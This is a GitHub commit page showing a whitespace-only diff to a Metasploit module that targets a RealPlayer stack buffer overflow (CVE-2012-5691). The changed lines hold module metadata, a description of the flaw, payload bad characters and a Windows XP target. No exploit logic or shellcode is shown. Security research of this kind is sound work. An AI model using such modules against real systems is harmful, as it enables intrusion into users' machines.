Skip to content

Commit 0b2ea3e

Browse files
committed
Fix weird tabs vs spaces prob
1 parent e895ccb commit 0b2ea3e

File tree

1 file changed

+10
-10
lines changed

1 file changed

+10
-10
lines changed

modules/exploits/windows/fileformat/real_player_url_property_bof.rb

Lines changed: 10 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
1515

1616
def initialize(info = {})
1717
super(update_info(info,
18-
'Name' => 'RealPlayer File Handling Buffer Overflow',
19-
'Description' => %q{
18+
'Name' => 'RealPlayer File Handling Buffer Overflow',
19+
'Description' => %q{
2020
This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14.
2121
The vulnerability exists in the handling of real media files, due to the insecure
2222
usage of the GetPrivateProfileString function to retrieve the URL property from an
@@ -26,12 +26,12 @@ def initialize(info = {})
2626
drag and drop or double click methods. It has been tested successfully on Windows
2727
XP SP3 with RealPlayer 15.0.5.109.
2828
},
29-
'License' => MSF_LICENSE,
30-
'Author' =>
29+
'License' => MSF_LICENSE,
30+
'Author' =>
3131
[
3232
'suto <suto[at]vnsecurity.net>' # Vulnerability discovery, metasploit module
3333
],
34-
'References' =>
34+
'References' =>
3535
[
3636
[ 'CVE', '2012-5691' ],
3737
[ 'OSVDB', '88486' ],
@@ -42,14 +42,14 @@ def initialize(info = {})
4242
{
4343
'ExitFunction' => 'process'
4444
},
45-
'Platform' => 'win',
46-
'Payload' =>
45+
'Platform' => 'win',
46+
'Payload' =>
4747
{
4848
'BadChars' => "\x00\x0a\x0d",
4949
'DisableNops' => true,
5050
'Space' => 2000
5151
},
52-
'Targets' =>
52+
'Targets' =>
5353
[
5454
[ 'Windows XP SP3 / Real Player 15.0.5.109',
5555
{
@@ -59,9 +59,9 @@ def initialize(info = {})
5959
}
6060
]
6161
],
62-
'Privileged' => false,
62+
'Privileged' => false,
6363
'DisclosureDate' => 'Dec 14 2012',
64-
'DefaultTarget' => 0))
64+
'DefaultTarget' => 0))
6565

6666
register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class)
6767

0 commit comments

Comments
 (0)